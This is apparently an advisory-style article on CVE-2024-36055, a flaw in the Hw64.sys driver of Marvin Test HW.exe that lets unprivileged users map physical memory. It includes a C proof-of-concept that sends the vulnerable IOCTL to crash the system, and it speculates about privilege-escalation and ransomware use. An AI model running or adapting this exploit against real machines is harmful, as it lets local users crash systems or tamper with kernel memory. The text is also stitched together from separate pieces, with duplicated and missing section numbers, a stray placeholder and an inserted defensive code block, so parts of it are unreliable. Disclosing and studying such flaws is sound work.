CVE-2024-36055 - How Unprivileged Users Can Crash Your System via Hw64.sys in Marvin Test HW.exe
Recently, a critical vulnerability was discovered in the Hw64.sys driver used by the Marvin Test HW.exe software (before version 5.0.5.0). Tracked as CVE-2024-36055, this flaw allows *any* local user—no admin needed—to map physical memory directly, opening the door to serious issues, including system crashes (aka Blue Screen of Death, or BSOD).
This guide covers what’s vulnerable, how the attack actually works, and demonstrates what an exploit might look like. Everything is explained in plain English.
1. What Is the Vulnerability?
Hw64.sys is a device driver that comes with Marvin Test HW.exe. It exposes several IOCTL commands (including 0x9c40a4f8, 0x9c40a4e8, 0x9c40a4c0, 0x9c40a4c4, and 0x9c40a4ec), which can be triggered by user-mode code—*yes, even by users without admin rights*.
The problem is that by sending a specially crafted IOCTL request to this driver, you can call the kernel's MmMapIoSpace function, which allows mapping any physical memory you want into your current process. With direct read/write access to physical memory, it’s trivial to crash the OS, potentially overwrite (or read) sensitive information, or disable security features.
2. Original References
- CVE-2024-36055 at NVD
- Marvin Test Solutions Product Download Page
- Exploit Database Entry (if available)
3. Exploitation Details
The vulnerability centers around how the driver exposes the kernel function MmMapIoSpace to anyone who can send the right IOCTL. Let's look at what goes on under the hood.
*(...plus at least 7 more...)*
By sending a device control request with these codes to the \\.\Hw64 device, you instruct the driver to map *arbitrary* physical addresses.
3. Send IOCTL: Call DeviceIoControl with the vulnerable IOCTL and buffer.
4. Access Memory: The driver calls MmMapIoSpace on behalf of the user, mapping the physical memory into your process’s address space.
5. Trigger BSOD: Any ill-formed memory operation can destroy kernel state, crash the machine, or hang it.
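The check missing from the handler described above, as an added example (not Marvin Test's code or its actual fix): before mapping anything, a driver can confine each request to physical windows its own device owns. The window addresses, `MAX_MAP_SIZE` and all names are constructed for illustration; the request struct reuses this article's guessed demo layout.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Same fields as the article's demo request (itself a guessed layout). */
typedef struct { uint64_t phys_address; uint32_t size; } mmap_request;

/* A physical window the driver legitimately owns, e.g. one PCI BAR. */
typedef struct { uint64_t base; uint64_t length; } phys_window;

#define MAX_MAP_SIZE 0x100000u /* hypothetical per-request cap (1 MiB) */

/* Constructed sample windows; a real driver would take these from the
 * hardware resources assigned to its own device at start-up. */
static const phys_window g_owned[] = {
    { 0xF7000000ull, 0x00100000ull },
    { 0xF7200000ull, 0x00004000ull },
};

/* True only if [phys_address, phys_address + size) lies entirely inside
 * one owned window. Meant to run before any mapping call is made. */
bool map_request_allowed(const mmap_request *req, size_t in_len,
                         const phys_window *win, size_t nwin)
{
    if (req == NULL || in_len < sizeof(*req))
        return false;                   /* short or missing input buffer */
    if (req->size == 0 || req->size > MAX_MAP_SIZE)
        return false;                   /* empty or oversized request */
    if (req->phys_address > UINT64_MAX - req->size)
        return false;                   /* base + size would wrap */
    uint64_t end = req->phys_address + req->size;
    for (size_t i = 0; i < nwin; i++) {
        uint64_t wend = win[i].base + win[i].length;
        if (req->phys_address >= win[i].base && end <= wend)
            return true;
    }
    return false;                       /* RAM, low memory, other devices */
}

int main(void)
{
    mmap_request low = { 0x0, 0x1000 }; /* low physical memory, one page */
    /* Exit status 0 means the request was refused, as it should be. */
    return map_request_allowed(&low, sizeof low, g_owned, 2) ? 1 : 0;
}
```

A range check complements, rather than replaces, an access-control list on the device object that keeps unprivileged users from opening it.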
4. Example Exploit (Proof-of-Concept)
Here's a *basic* example in C to trigger the bug and crash the system. Never run this on a production PC! Only for educational use in a test environment.
```c
#include <windows.h>
#include <stdio.h>

#define DEVICE_NAME "\\\\.\\Hw64"
#define IOCTL_MMAP_PHYS 0x9c40a4f8

// Structure layout may change; for demo, we just use a dummy buffer.
typedef struct _MMAP_REQUEST {
    ULONG64 PhysAddress; // Physical address to map
    ULONG   Size;        // Size to map
} MMAP_REQUEST;

int main() {
    HANDLE hDevice = CreateFileA(DEVICE_NAME, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device, error %lu\n", GetLastError());
        return -1;
    }

    MMAP_REQUEST req = { 0 };
    req.PhysAddress = 0x0; // Try to map NULL/low memory - dangerous!
    req.Size = 0x1000;     // Map one page

    DWORD returned = 0;
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_MMAP_PHYS,
        &req, sizeof(req),
        NULL, 0,
        &returned,
        NULL);

    if (!result) {
        printf("DeviceIoControl failed: %lu\n", GetLastError());
    } else {
        printf("Request succeeded—system may now be unstable or crash.\n");
    }

    CloseHandle(hDevice);
    return 0;
}
```
*Warning: This code is for research only. Do not run on any system you care about.*
- Attackers could use this as part of a larger privilege escalation chain.
- Could be weaponized for ransomware (immediate BSOD) or to bypass basic security tools by tampering with kernel memory.
6. Remediation
Upgrade ASAP:
If you use Marvin Test HW.exe with Hw64.sys, upgrade to version 5.0.5.0 or later IMMEDIATELY.
7. Conclusion
CVE-2024-36055 is dangerously simple to exploit. Any process can use Marvin Test's old Hw64.sys to map and manipulate *any part of system memory*. If you're running an affected version, patch now!
Stay safe. Always keep track of driver vulnerabilities—they can open up your whole machine!
Further Reading:
- Microsoft: Understanding mmio mapping
- A quick intro to Windows IOCTLs
Timeline
Published on: 05/26/2024 23:15:21 UTC
Last modified on: 10/30/2024 20:35:20 UTC